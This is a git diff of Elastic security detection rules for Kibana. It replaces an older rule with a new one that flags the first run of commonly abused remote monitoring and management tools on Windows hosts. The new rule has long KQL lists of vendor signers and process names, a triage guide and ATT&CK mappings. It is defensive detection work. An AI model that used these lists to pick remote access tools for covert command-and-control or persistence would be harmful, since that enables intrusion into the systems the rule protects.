- "winlogbeat-*",
- "logs-windows.forwarded*",
- "logs-windows.sysmon_operational-*",
- "logs-system.security*"
- ],
- "language": "kuery",
- "license": "Elastic License v2",
- "name": "First Time Seen Commonly Abused Remote Access Tool Execution",
- "new_terms_fields": [
- "host.id"
- ],
- "note": "## Triage and analysis\n\n### Investigating First Time Seen Commonly Abused Remote Access Tool Execution\n\nRemote access software is a class of tools commonly used by IT departments to provide support by connecting securely to users' computers. Remote access is an ever-growing market where new companies constantly offer new ways of quickly accessing remote systems.\n\nAt the same pace as IT departments adopt these tools, the attackers also adopt them as part of their workflow to connect into an interactive session, maintain access with legitimate software as a persistence mechanism, drop malicious software, etc.\n\nThis rule detects when a remote access tool is seen in the environment for the first time in the last 15 days, enabling analysts to investigate and enforce the correct usage of such tools.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check if the execution of the remote access tool is approved by the organization's IT department.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n - If the tool is not approved for use in the organization, the employee could have been tricked into installing it and providing access to a malicious third party. Investigate whether this third party could be attempting to scam the end-user or gain access to the environment through social engineering.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- If an authorized support person or administrator used the tool to conduct legitimate support or remote access, consider reinforcing that only tooling approved by the IT policy should be used. The analyst can dismiss the alert if no other suspicious behavior is observed involving the host or users.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If an unauthorized third party did the access via social engineering, consider improvements to the security awareness program.\n- Enforce that only tooling approved by the IT policy should be used for remote access purposes and only by authorized staff.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
- "query": "host.os.type: \"windows\" and\n\n event.category: \"process\" and event.type : \"start\" and\n\n (\n process.code_signature.subject_name : (\n \"Action1 Corporation\" or\n \"AeroAdmin LLC\" or\n \"Ammyy LLC\" or\n \"Atera Networks Ltd\" or\n \"AWERAY PTE. LTD.\" or\n \"BeamYourScreen GmbH\" or\n \"Bomgar Corporation\" or\n \"DUC FABULOUS CO.,LTD\" or\n \"DOMOTZ INC.\" or\n \"DWSNET O\u00dc\" or\n \"FleetDeck Inc\" or\n \"GlavSoft LLC\" or\n \"GlavSoft LLC.\" or\n \"Hefei Pingbo Network Technology Co. 
Ltd\" or\n \"IDrive, Inc.\" or\n \"IMPERO SOLUTIONS LIMITED\" or\n \"Instant Housecall\" or\n \"ISL Online Ltd.\" or\n \"LogMeIn, Inc.\" or\n \"Monitoring Client\" or\n \"MMSOFT Design Ltd.\" or\n \"Nanosystems S.r.l.\" or\n \"NetSupport Ltd\" or\n \"NinjaRMM, LLC\" or\n \"Parallels International GmbH\" or\n \"philandro Software GmbH\" or\n \"Pro Softnet Corporation\" or\n \"RealVNC\" or\n \"RealVNC Limited\" or\n \"BreakingSecurity.net\" or\n \"Remote Utilities LLC\" or\n \"Rocket Software, Inc.\" or\n \"SAFIB\" or\n \"Servably, Inc.\" or\n \"ShowMyPC INC\" or\n \"Splashtop Inc.\" or\n \"Superops Inc.\" or\n \"TeamViewer\" or\n \"TeamViewer GmbH\" or\n \"TeamViewer Germany GmbH\" or\n \"Techinline Limited\" or\n \"uvnc bvba\" or\n \"Yakhnovets Denis Aleksandrovich IP\" or\n \"Zhou Huabing\"\n ) or\n\n process.name.caseless : (\n AA_v*.exe or\n \"AeroAdmin.exe\" or\n \"AnyDesk.exe\" or\n \"apc_Admin.exe\" or\n \"apc_host.exe\" or\n \"AteraAgent.exe\" or\n aweray_remote*.exe or\n \"AweSun.exe\" or\n \"B4-Service.exe\" or\n \"BASupSrvc.exe\" or\n \"bomgar-scc.exe\" or\n \"domotzagent.exe\" or\n \"domotz-windows-x64-10.exe\" or\n \"dwagsvc.exe\" or\n \"DWRCC.exe\" or\n \"ImperoClientSVC.exe\" or\n \"ImperoServerSVC.exe\" or\n \"ISLLight.exe\" or\n \"ISLLightClient.exe\" or\n fleetdeck_commander*.exe or\n \"getscreen.exe\" or\n \"LMIIgnition.exe\" or\n \"LogMeIn.exe\" or\n \"ManageEngine_Remote_Access_Plus.exe\" or\n \"Mikogo-Service.exe\" or\n \"NinjaRMMAgent.exe\" or\n \"NinjaRMMAgenPatcher.exe\" or\n \"ninjarmm-cli.exe\" or\n \"r_server.exe\" or\n \"radmin.exe\" or\n \"radmin3.exe\" or\n \"RCClient.exe\" or\n \"RCService.exe\" or\n \"RemoteDesktopManager.exe\" or\n \"RemotePC.exe\" or\n \"RemotePCDesktop.exe\" or\n \"RemotePCService.exe\" or\n \"rfusclient.exe\" or\n \"ROMServer.exe\" or\n \"ROMViewer.exe\" or\n \"RPCSuite.exe\" or\n \"rserver3.exe\" or\n \"rustdesk.exe\" or\n \"rutserv.exe\" or\n \"rutview.exe\" or\n \"saazapsc.exe\" or\n ScreenConnect*.exe or\n 
\"smpcview.exe\" or\n \"spclink.exe\" or\n \"Splashtop-streamer.exe\" or\n \"SRService.exe\" or\n \"strwinclt.exe\" or\n \"Supremo.exe\" or\n \"SupremoService.exe\" or\n \"teamviewer.exe\" or\n \"TiClientCore.exe\" or\n \"TSClient.exe\" or\n \"tvn.exe\" or\n \"tvnserver.exe\" or\n \"tvnviewer.exe\" or\n UltraVNC*.exe or\n UltraViewer*.exe or\n \"vncserver.exe\" or\n \"vncviewer.exe\" or\n \"winvnc.exe\" or\n \"winwvc.exe\" or\n \"Zaservice.exe\" or\n \"ZohoURS.exe\"\n ) or\n process.name : (\n AA_v*.exe or\n \"AeroAdmin.exe\" or\n \"AnyDesk.exe\" or\n \"apc_Admin.exe\" or\n \"apc_host.exe\" or\n \"AteraAgent.exe\" or\n aweray_remote*.exe or\n \"AweSun.exe\" or\n \"B4-Service.exe\" or\n \"BASupSrvc.exe\" or\n \"bomgar-scc.exe\" or\n \"domotzagent.exe\" or\n \"domotz-windows-x64-10.exe\" or\n \"dwagsvc.exe\" or\n \"DWRCC.exe\" or\n \"ImperoClientSVC.exe\" or\n \"ImperoServerSVC.exe\" or\n \"ISLLight.exe\" or\n \"ISLLightClient.exe\" or\n fleetdeck_commander*.exe or\n \"getscreen.exe\" or\n \"LMIIgnition.exe\" or\n \"LogMeIn.exe\" or\n \"ManageEngine_Remote_Access_Plus.exe\" or\n \"Mikogo-Service.exe\" or\n \"NinjaRMMAgent.exe\" or\n \"NinjaRMMAgenPatcher.exe\" or\n \"ninjarmm-cli.exe\" or\n \"r_server.exe\" or\n \"radmin.exe\" or\n \"radmin3.exe\" or\n \"RCClient.exe\" or\n \"RCService.exe\" or\n \"RemoteDesktopManager.exe\" or\n \"RemotePC.exe\" or\n \"RemotePCDesktop.exe\" or\n \"RemotePCService.exe\" or\n \"rfusclient.exe\" or\n \"ROMServer.exe\" or\n \"ROMViewer.exe\" or\n \"RPCSuite.exe\" or\n \"rserver3.exe\" or\n \"rustdesk.exe\" or\n \"rutserv.exe\" or\n \"rutview.exe\" or\n \"saazapsc.exe\" or\n ScreenConnect*.exe or\n \"smpcview.exe\" or\n \"spclink.exe\" or\n \"Splashtop-streamer.exe\" or\n \"SRService.exe\" or\n \"strwinclt.exe\" or\n \"Supremo.exe\" or\n \"SupremoService.exe\" or\n \"teamviewer.exe\" or\n \"TiClientCore.exe\" or\n \"TSClient.exe\" or\n \"tvn.exe\" or\n \"tvnserver.exe\" or\n \"tvnviewer.exe\" or\n UltraVNC*.exe or\n UltraViewer*.exe or\n 
\"vncserver.exe\" or\n \"vncviewer.exe\" or\n \"winvnc.exe\" or\n \"winwvc.exe\" or\n \"Zaservice.exe\" or\n \"ZohoURS.exe\"\n )\n\t) and\n\n\tnot (process.pe.original_file_name : (\"G2M.exe\" or \"Updater.exe\" or \"powershell.exe\") and process.code_signature.subject_name : \"LogMeIn, Inc.\")\n", - "references": [ - "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", - "https://attack.mitre.org/techniques/T1219/", - "https://github.com/redcanaryco/surveyor/blob/master/definitions/remote-admin.json" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "windows", - "version": "^3.0.0" - }, - { - "package": "system", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.code_signature.subject_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "process.name.caseless", - "type": "unknown" - }, - { - "ecs": true, - "name": "process.pe.original_file_name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "6e1a2cc4-d260-11ed-8829-f661ea17fbcc", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Windows Security Event Logs", - "Data Source: Sysmon" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0011", - "name": "Command and Control", - "reference": "https://attack.mitre.org/tactics/TA0011/" - }, - "technique": [ - { - "id": "T1219", - "name": "Remote Access Tools", - "reference": 
"https://attack.mitre.org/techniques/T1219/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 112 - }, - "id": "6e1a2cc4-d260-11ed-8829-f661ea17fbcc_112", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_116.json b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_116.json new file mode 100644 index 00000000000..fd41a2b19d7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_116.json 
@@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may install legitimate remote monitoring and management (RMM) tools or remote access software on compromised endpoints for command-and-control (C2), persistence, and execution of native commands. This rule detects when a process is started whose name or code signature (or whose parent's name or code signature) resembles commonly abused RMM/remote access tools, including first-time-seen child processes of such tools. New Terms type: host has not seen this process (or child-of-RMM pattern) before within the configured history window.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.process-*", + "endgame-*", + "winlogbeat-*", + "logs-windows.forwarded*", + "logs-windows.sysmon_operational-*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Seen Remote Monitoring and Management Tool", + "new_terms_fields": [ + "host.id" + ], + "note": "## Triage and analysis\n\n### Investigating First Time Seen Remote Monitoring and Management Tool\n\nRemote monitoring and management (RMM) and remote access software are commonly used by IT departments to provide support and manage endpoints. Attackers adopt the same tools to connect into interactive sessions, maintain access as a persistence mechanism, and drop malicious software.\n\nThis rule detects when an RMM or remote access process is seen on a host for the first time within the new_terms history window (see rule.new_terms), enabling analysts to investigate and enforce the correct usage of such tools.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check if the execution of the RMM or remote access tool is approved by the organization's IT department.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n - If the tool is not approved for use in the organization, the employee could have been tricked into installing it and providing access to a malicious third party. Investigate whether this third party could be attempting to scam the end-user or gain access to the environment through social engineering.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- If an authorized support person or administrator used the tool to conduct legitimate support or remote access, consider reinforcing that only tooling approved by the IT policy should be used. The analyst can dismiss the alert if no other suspicious behavior is observed involving the host or users.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If an unauthorized third party did the access via social engineering, consider improvements to the security awareness program.\n- Enforce that only tooling approved by the IT policy should be used for remote access purposes and only by authorized staff.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type: \"windows\" and\n\n event.category: \"process\" and event.type: \"start\" and\n\n (\n process.code_signature.subject_name : (\n \"Action1 Corporation\" or\n \"AeroAdmin LLC\" or\n \"Ammyy LLC\" or\n \"Atera Networks Ltd\" or\n \"AWERAY PTE. LTD.\" or\n \"BeamYourScreen GmbH\" or\n \"Bomgar Corporation\" or\n \"DUC FABULOUS CO.,LTD\" or\n \"DOMOTZ INC.\" or\n \"DWSNET O\u00dc\" or\n \"FleetDeck Inc\" or\n \"GlavSoft LLC\" or\n \"GlavSoft LLC.\" or\n \"Hefei Pingbo Network Technology Co. 
Ltd\" or\n \"IDrive, Inc.\" or\n \"IMPERO SOLUTIONS LIMITED\" or\n \"Instant Housecall\" or\n \"ISL Online Ltd.\" or\n \"LogMeIn, Inc.\" or\n \"Monitoring Client\" or\n \"MMSOFT Design Ltd.\" or\n \"Nanosystems S.r.l.\" or\n \"NetSupport Ltd\" or\n \"NetSupport Ltd.\" or\n \"NETSUPPORT LTD.\" or\n \"NinjaRMM, LLC\" or\n \"Parallels International GmbH\" or\n \"philandro Software GmbH\" or\n \"Pro Softnet Corporation\" or\n \"RealVNC\" or\n \"RealVNC Limited\" or\n \"BreakingSecurity.net\" or\n \"Remote Utilities LLC\" or\n \"Rocket Software, Inc.\" or\n \"SAFIB\" or\n \"Servably, Inc.\" or\n \"ShowMyPC INC\" or\n \"Splashtop Inc.\" or\n \"Superops Inc.\" or\n \"TeamViewer\" or\n \"TeamViewer GmbH\" or\n \"TeamViewer Germany GmbH\" or\n \"Techinline Limited\" or\n \"uvnc bvba\" or\n \"Yakhnovets Denis Aleksandrovich IP\" or\n \"Zhou Huabing\" or\n \"ZOHO Corporation Private Limited\" or\n \"Connectwise, LLC\" or \n\t\t\t\"ScreenConnect Client\" or\n\t\t\t\"Servably Inc.\"\n ) or\n\n process.name.caseless : (\n AA_v*.exe or\n \"AeroAdmin.exe\" or\n \"AnyDesk.exe\" or\n \"apc_Admin.exe\" or\n \"apc_host.exe\" or\n \"AteraAgent.exe\" or\n aweray_remote*.exe or\n \"AweSun.exe\" or\n \"AgentMon.exe\" or\n \"B4-Service.exe\" or\n \"BASupSrvc.exe\" or\n \"bomgar-scc.exe\" or\n \"domotzagent.exe\" or\n \"domotz-windows-x64-10.exe\" or\n \"dwagsvc.exe\" or\n \"DWRCC.exe\" or\n \"ImperoClientSVC.exe\" or\n \"ImperoServerSVC.exe\" or\n \"ISLLight.exe\" or\n \"ISLLightClient.exe\" or\n fleetdeck_commander*.exe or\n \"getscreen.exe\" or\n \"g2aservice.exe\" or\n \"GoToAssistService.exe\" or\n \"gotohttp.exe\" or\n \"jumpcloud-agent.exe\" or\n \"level.exe\" or\n \"LvAgent.exe\" or\n \"LMIIgnition.exe\" or\n \"LogMeIn.exe\" or\n \"ManageEngine_Remote_Access_Plus.exe\" or\n \"MeshAgent.exe\" or\n \"Mikogo-Service.exe\" or\n \"NinjaRMMAgent.exe\" or\n \"NinjaRMMAgenPatcher.exe\" or\n \"ninjarmm-cli.exe\" or\n \"parsec.exe\" or\n \"PService.exe\" or\n \"quickassist.exe\" or\n 
\"r_server.exe\" or\n \"radmin.exe\" or\n \"radmin3.exe\" or\n \"RCClient.exe\" or\n \"RCService.exe\" or\n \"RemoteDesktopManager.exe\" or\n \"RemotePC.exe\" or\n \"RemotePCDesktop.exe\" or\n \"RemotePCService.exe\" or\n \"rfusclient.exe\" or\n \"ROMServer.exe\" or\n \"ROMViewer.exe\" or\n \"RPCSuite.exe\" or\n \"rserver3.exe\" or\n \"rustdesk.exe\" or\n \"rutserv.exe\" or\n \"rutview.exe\" or\n \"saazapsc.exe\" or\n ScreenConnect*.exe or\n \"session_win.exe\" or\n \"Remote Support.exe\" or\n \"smpcview.exe\" or\n \"spclink.exe\" or\n \"Splashtop-streamer.exe\" or\n \"Syncro.Overmind.Service.exe\" or\n \"SyncroLive.Agent.Runner.exe\" or\n \"SRService.exe\" or\n \"strwinclt.exe\" or\n \"Supremo.exe\" or\n \"SupremoService.exe\" or\n \"tacticalrmm.exe\" or\n \"tailscale.exe\" or\n \"tailscaled.exe\" or\n \"teamviewer.exe\" or\n \"ToDesk_Service.exe\" or\n \"twingate.exe\" or\n \"TiClientCore.exe\" or\n \"TSClient.exe\" or\n \"tvn.exe\" or\n \"tvnserver.exe\" or\n \"tvnviewer.exe\" or\n UltraVNC*.exe or\n UltraViewer*.exe or\n \"vncserver.exe\" or\n \"vncviewer.exe\" or\n \"winvnc.exe\" or\n \"winwvc.exe\" or\n \"Zaservice.exe\" or\n \"ZohoURS.exe\" or\n \"Velociraptor.exe\" or\n \"ToolsIQ.exe\" or\n \"CagService.exe\" or \n\t\t\t\"ScreenConnect.ClientService.exe\" or \n\t\t\t\"TiAgent.exe\" or \n\t\t\t\"GoToResolveProcessChecker.exe\" or \n\t\t\t\"GoToResolveUnattended.exe\" or \n\t\t\t\"Syncro.Installer.exe\"\n ) or\n process.name : (\n AA_v*.exe or\n \"AeroAdmin.exe\" or\n \"AnyDesk.exe\" or\n \"apc_Admin.exe\" or\n \"apc_host.exe\" or\n \"AteraAgent.exe\" or\n aweray_remote*.exe or\n \"AweSun.exe\" or\n \"AgentMon.exe\" or\n \"B4-Service.exe\" or\n \"BASupSrvc.exe\" or\n \"bomgar-scc.exe\" or\n \"CagService.exe\" or\n \"domotzagent.exe\" or\n \"domotz-windows-x64-10.exe\" or\n \"dwagsvc.exe\" or\n \"DWRCC.exe\" or\n \"ImperoClientSVC.exe\" or\n \"ImperoServerSVC.exe\" or\n \"ISLLight.exe\" or\n \"ISLLightClient.exe\" or\n fleetdeck_commander*.exe or\n 
\"getscreen.exe\" or\n \"g2aservice.exe\" or\n \"GoToAssistService.exe\" or\n \"gotohttp.exe\" or\n \"jumpcloud-agent.exe\" or\n \"level.exe\" or\n \"LvAgent.exe\" or\n \"LMIIgnition.exe\" or\n \"LogMeIn.exe\" or\n \"ManageEngine_Remote_Access_Plus.exe\" or\n \"MeshAgent.exe\" or\n \"meshagent.exe\" or\n \"Mikogo-Service.exe\" or\n \"NinjaRMMAgent.exe\" or\n \"NinjaRMMAgenPatcher.exe\" or\n \"ninjarmm-cli.exe\" or\n \"parsec.exe\" or\n \"PService.exe\" or\n \"quickassist.exe\" or\n \"r_server.exe\" or\n \"radmin.exe\" or\n \"radmin3.exe\" or\n \"RCClient.exe\" or\n \"RCService.exe\" or\n \"RemoteDesktopManager.exe\" or\n \"RemotePC.exe\" or\n \"RemotePCDesktop.exe\" or\n \"RemotePCService.exe\" or\n \"rfusclient.exe\" or\n \"ROMServer.exe\" or\n \"ROMViewer.exe\" or\n \"RPCSuite.exe\" or\n \"rserver3.exe\" or\n \"rustdesk.exe\" or\n \"rutserv.exe\" or\n \"rutview.exe\" or\n \"saazapsc.exe\" or\n ScreenConnect*.exe or\n \"session_win.exe\" or\n \"Remote Support.exe\" or\n \"smpcview.exe\" or\n \"spclink.exe\" or\n \"Splashtop-streamer.exe\" or\n \"Syncro.Overmind.Service.exe\" or\n \"SyncroLive.Agent.Runner.exe\" or\n \"SRService.exe\" or\n \"strwinclt.exe\" or\n \"Supremo.exe\" or\n \"SupremoService.exe\" or\n \"tacticalrmm.exe\" or\n \"tailscale.exe\" or\n \"tailscaled.exe\" or\n \"teamviewer.exe\" or\n \"TiClientCore.exe\" or\n \"ToDesk_Service.exe\" or\n \"twingate.exe\" or\n \"TSClient.exe\" or\n \"tvn.exe\" or\n \"tvnserver.exe\" or\n \"tvnviewer.exe\" or\n UltraVNC*.exe or\n UltraViewer*.exe or\n \"vncserver.exe\" or\n \"vncviewer.exe\" or\n \"winvnc.exe\" or\n \"winwvc.exe\" or\n \"Zaservice.exe\" or\n \"ZohoURS.exe\" or\n \"Velociraptor.exe\" or\n \"ToolsIQ.exe\" or \n\t\t\t\"ScreenConnect.ClientService.exe\" or \n\t\t\t\"TiAgent.exe\" or \n\t\t\t\"GoToResolveProcessChecker.exe\" or \n\t\t\t\"GoToResolveUnattended.exe\" or \n\t\t\t\"Syncro.Installer.exe\"\n ) or\n process.parent.code_signature.subject_name : (\n \"Action1 Corporation\" or\n \"AeroAdmin 
LLC\" or\n \"Ammyy LLC\" or\n \"Atera Networks Ltd\" or\n \"AWERAY PTE. LTD.\" or\n \"BeamYourScreen GmbH\" or\n \"Bomgar Corporation\" or\n \"DUC FABULOUS CO.,LTD\" or\n \"DOMOTZ INC.\" or\n \"DWSNET O\u00dc\" or\n \"FleetDeck Inc\" or\n \"GlavSoft LLC\" or\n \"GlavSoft LLC.\" or\n \"Hefei Pingbo Network Technology Co. Ltd\" or\n \"IDrive, Inc.\" or\n \"IMPERO SOLUTIONS LIMITED\" or\n \"Instant Housecall\" or\n \"ISL Online Ltd.\" or\n \"LogMeIn, Inc.\" or\n \"Monitoring Client\" or\n \"MMSOFT Design Ltd.\" or\n \"Nanosystems S.r.l.\" or\n \"NetSupport Ltd\" or\n \"NetSupport Ltd.\" or\n \"NETSUPPORT LTD.\" or\n \"NinjaRMM, LLC\" or\n \"Parallels International GmbH\" or\n \"philandro Software GmbH\" or\n \"Pro Softnet Corporation\" or\n \"RealVNC\" or\n \"RealVNC Limited\" or\n \"BreakingSecurity.net\" or\n \"Remote Utilities LLC\" or\n \"Rocket Software, Inc.\" or\n \"SAFIB\" or\n \"Servably, Inc.\" or\n \"ShowMyPC INC\" or\n \"Splashtop Inc.\" or\n \"Superops Inc.\" or\n \"TeamViewer\" or\n \"TeamViewer GmbH\" or\n \"TeamViewer Germany GmbH\" or\n \"Techinline Limited\" or\n \"uvnc bvba\" or\n \"Yakhnovets Denis Aleksandrovich IP\" or\n \"Zhou Huabing\" or\n \"ZOHO Corporation Private Limited\" or\n \"Connectwise, LLC\" or \n\t\t\t\"ScreenConnect Client\" or\n\t\t\t\"Servably Inc.\"\n ) or\n process.parent.name: (\n AA_v*.exe or\n \"AeroAdmin.exe\" or\n \"AnyDesk.exe\" or\n \"apc_Admin.exe\" or\n \"apc_host.exe\" or\n \"AteraAgent.exe\" or\n aweray_remote*.exe or\n \"AweSun.exe\" or\n \"AgentMon.exe\" or\n \"B4-Service.exe\" or\n \"BASupSrvc.exe\" or\n \"bomgar-scc.exe\" or\n \"domotzagent.exe\" or\n \"domotz-windows-x64-10.exe\" or\n \"dwagsvc.exe\" or\n \"DWRCC.exe\" or\n \"ImperoClientSVC.exe\" or\n \"ImperoServerSVC.exe\" or\n \"ISLLight.exe\" or\n \"ISLLightClient.exe\" or\n fleetdeck_commander*.exe or\n \"getscreen.exe\" or\n \"g2aservice.exe\" or\n \"GoToAssistService.exe\" or\n \"gotohttp.exe\" or\n \"jumpcloud-agent.exe\" or\n \"level.exe\" or\n 
\"LvAgent.exe\" or\n \"LMIIgnition.exe\" or\n \"LogMeIn.exe\" or\n \"ManageEngine_Remote_Access_Plus.exe\" or\n \"MeshAgent.exe\" or\n \"Mikogo-Service.exe\" or\n \"NinjaRMMAgent.exe\" or\n \"NinjaRMMAgenPatcher.exe\" or\n \"ninjarmm-cli.exe\" or\n \"parsec.exe\" or\n \"PService.exe\" or\n \"quickassist.exe\" or\n \"r_server.exe\" or\n \"radmin.exe\" or\n \"radmin3.exe\" or\n \"RCClient.exe\" or\n \"RCService.exe\" or\n \"RemoteDesktopManager.exe\" or\n \"RemotePC.exe\" or\n \"RemotePCDesktop.exe\" or\n \"RemotePCService.exe\" or\n \"rfusclient.exe\" or\n \"ROMServer.exe\" or\n \"ROMViewer.exe\" or\n \"RPCSuite.exe\" or\n \"rserver3.exe\" or\n \"rustdesk.exe\" or\n \"rutserv.exe\" or\n \"rutview.exe\" or\n \"saazapsc.exe\" or\n ScreenConnect*.exe or\n \"session_win.exe\" or\n \"Remote Support.exe\" or\n \"smpcview.exe\" or\n \"spclink.exe\" or\n \"Splashtop-streamer.exe\" or\n \"Syncro.Overmind.Service.exe\" or\n \"SyncroLive.Agent.Runner.exe\" or\n \"SRService.exe\" or\n \"strwinclt.exe\" or\n \"Supremo.exe\" or\n \"SupremoService.exe\" or\n \"tacticalrmm.exe\" or\n \"tailscale.exe\" or\n \"tailscaled.exe\" or\n \"teamviewer.exe\" or\n \"ToDesk_Service.exe\" or\n \"twingate.exe\" or\n \"TiClientCore.exe\" or\n \"TSClient.exe\" or\n \"tvn.exe\" or\n \"tvnserver.exe\" or\n \"tvnviewer.exe\" or\n UltraVNC*.exe or\n UltraViewer*.exe or\n \"vncserver.exe\" or\n \"vncviewer.exe\" or\n \"winvnc.exe\" or\n \"winwvc.exe\" or\n \"Zaservice.exe\" or\n \"ZohoURS.exe\" or\n \"Velociraptor.exe\" or\n \"ToolsIQ.exe\" or\n \"CagService.exe\" or \n\t\t\t\"TiAgent.exe\" or \n\t\t\t\"GoToResolveProcessChecker.exe\" or \n\t\t\t\"GoToResolveUnattended.exe\"\n )\n ) and\n not (process.pe.original_file_name : (\"G2M.exe\" or \"Updater.exe\" or \"powershell.exe\") and process.code_signature.subject_name : \"LogMeIn, Inc.\")\n", + "references": [ + "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", + 
"https://attack.mitre.org/techniques/T1219/002/", + "https://github.com/redcanaryco/surveyor/blob/master/definitions/remote-admin.json", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a", + "https://www.cisa.gov/sites/default/files/2025-06/aa25-163a-ransomware-simplehelp-rmm-compromise.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.name.caseless", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.parent.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6e1a2cc4-d260-11ed-8829-f661ea17fbcc", + "setup": "## Setup\n\n- **New terms window**: The rule uses `new_terms_fields: host.id` with a 7-day history window. The first time a matching RMM/remote access process is seen on a host within that window will trigger the alert.\n- **Velociraptor**: If your organization deploys Velociraptor for DFIR or hunting, consider adding a rule exception by host group or excluding `process.name: \"Velociraptor.exe\"` where appropriate.\n- **Elastic Defend**: For best coverage ensure process events with `process.code_signature` and `process.name` are ingested from Windows endpoints (e.g. 
logs-endpoint.events.process-*).\n- **Parent matching**: The rule also matches when the started process's parent has an RMM/remote access name or code signer, so first-time child processes (e.g. scripts or binaries spawned by TeamViewer, ScreenConnect, AteraAgent, MeshAgent) are detected. Complement with DNS-based detection (e.g. Sigma rule for remote access software domains from non-browser processes) for full coverage.\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1219", + "name": "Remote Access Tools", + "reference": "https://attack.mitre.org/techniques/T1219/", + "subtechnique": [ + { + "id": "T1219.002", + "name": "Remote Desktop Software", + "reference": "https://attack.mitre.org/techniques/T1219/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 116 + }, + "id": "6e1a2cc4-d260-11ed-8829-f661ea17fbcc_116", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_207.json b/packages/security_detection_engine/kibana/security_rule/6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_207.json deleted file mode 100644 index fdb10464f88..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_207.json +++ /dev/null 
